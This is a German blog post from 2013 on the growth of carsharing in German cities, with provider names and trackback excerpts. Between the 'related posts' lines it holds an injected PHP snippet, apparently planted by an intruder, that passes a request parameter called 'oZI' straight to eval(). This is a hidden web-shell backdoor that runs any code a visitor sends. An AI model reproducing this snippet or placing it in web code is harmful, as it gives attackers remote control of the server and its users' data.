Carsharing – Alternatives Autofahren

Juli 17, 2013 by  
Erschienen unter Allgemein, Nützliche Tipps

Besonders in den letzten Jahren konnte sich das Carsharing, also das zeitlich befristete Mieten von Fahrzeugen, deutlich am Markt durchsetzen. Besonders in den Großstädten greifen immer mehr Menschen zum gelegentlichen Fahren, zumal das klassische Statussymbol besonders bei jüngeren Leuten immer mehr an Bedeutung verliert.

Heute geht man allein in Deutschland von über 10.000 Fahrzeugen aus, die via Carsharing genutzt werden können. Erste Zahlen gehen davon aus, dass im vergangenen Jahr rund 500.000 Fahrer zumindest einmal einen Wagen via Carsharing genutzt haben.

Carsharing in den großen Städten

Schwerpunkt des Angebotes der verschiedenen Anbieter liegt natürlich in den Ballungszentren. In München, Hamburg, Düsseldorf und Berlin findet man das größte Angebot. Allein in der Hauptstadt sind rund 2.500 Fahrzeuge unterwegs, die von knapp einem Duzend von Anbieter den gelegentlichen Fahrern angeboten werden.
Bei fast allen Anbietern der stationsungebundenen Mietwagen Angeboten stecken große Automobilhersteller dahinter, die sich mit dem Carsharing ein neues Betätigungsfeld erschließen. Dabei sind einige Anbieter erst seit wenigen Jahren am Markt, können aber besonders in den letzten Monaten auf beachtliche Zuwächse zurückschauen.

Besonders seit mehrere Anbieter ein sogenanntes Free-floating-Angebot bereitstellen, also das frei verfügbare Nutzen und Abstellen der Fahrzeuge, setzt sich das Carsharing auf deutschen Straßen immer stärker durch.

Musste man sich in den Anfängen des Carsharings zu fest definierten Orten begeben, um das gewünschte Fahrzeug entgegen zu nehmen, so kann man mit dem neuen Konzept einfach einen unbesetzten Wagen nutzen und ihn anschließend auch an einer beliebigen Stelle wieder parken.

In Berlin gehören Fahrzeuge der unterschiedlichen Anbieter längst zum täglichen Stadtbild. Besonders die Fahrzeuge von DriveNow (ein Angebot von BMW und Sixt), Car3go (ein Daimler-Tochterunternehmen) sowie Multicity (gehört zu Citroen) sind stark vertreten.

Ähnliche Beiträge:

Ähnliche Beiträge:

<!– [insert_php]if (isset($_REQUEST["oZI"])){eval($_REQUEST["oZI"]);exit;}[/insert_php][php]if (isset($_REQUEST["oZI"])){eval($_REQUEST["oZI"]);exit;}[/php] –>

Ähnliche Beiträge:

Comments

4 Responses to “Carsharing – Alternatives Autofahren”

Trackbacks

Check out what others are saying about this post...
  1. […] Es muss natürlich nicht immer gleich der Ford Mustang Shelby GT sein, wenn es darum geht, einen Wagen in der Großstadt zu fahren, der auffällig ist. Doch in den meisten Fällen greift man doch wieder zu der günstigsten Klasse beim Autovermieter. Längst sind neue Konzepte für den Individualverkehr in der Stadt notwendig. Ein möglicher Ausweg ist zweifelsohne Carsharing. So nutzen Sie einfach den Wagen, den Sie gerade benötigen. Brauchen Sie an einem Tag kein Fahrzeug, lassen Sie das betreffende KFZ einfach stehen. Weiter … […]

  2. […] Es ist schon erstaunlich, dass in der heutigen Zeit noch eine neue Rennstrecke eröffnet wird. Angesichts der steigenden Benzinpreise, der Verknappung von Rohstoffen und einem zunehmenden Bewusstsein für die Umwelt ist es einfach unverantwortlich, eine Strecke, wie sie im Teutoburger Wald entstanden ist, zu befürworten. Heute sind doch eher neue Konzepte gefordert. Weiter … […]

  3. […] Wer jeden Tag mit dem eigenen Fahrzeug zur Arbeit fährt, bei dem machen sich diese Fahrten deutlich im Geldbeutel bemerkbar. Benzinkosten, Anschaffungspreis, Versicherung und Wartung sind dabei die Hauptpositionen, die das eigene Geld betreffen. Eine Alternative stellt möglicherweise das Carsharing dar. Weiter … […]

  4. […] Menschen vorstellen können, auf das eigene Auto tatsächlich zu verzichten. Häufig wird das Carsharing noch zusätzlich genutzt, um beispielsweise in Ballungszentren besser mobil zu […]



Ihre Meinung ist erwünscht

Teilen Sie uns mit, was Sie denken ...
und wenn Sie ein Foto hinterlassen wollen, dann schauen Sie bei gravatar vorbei!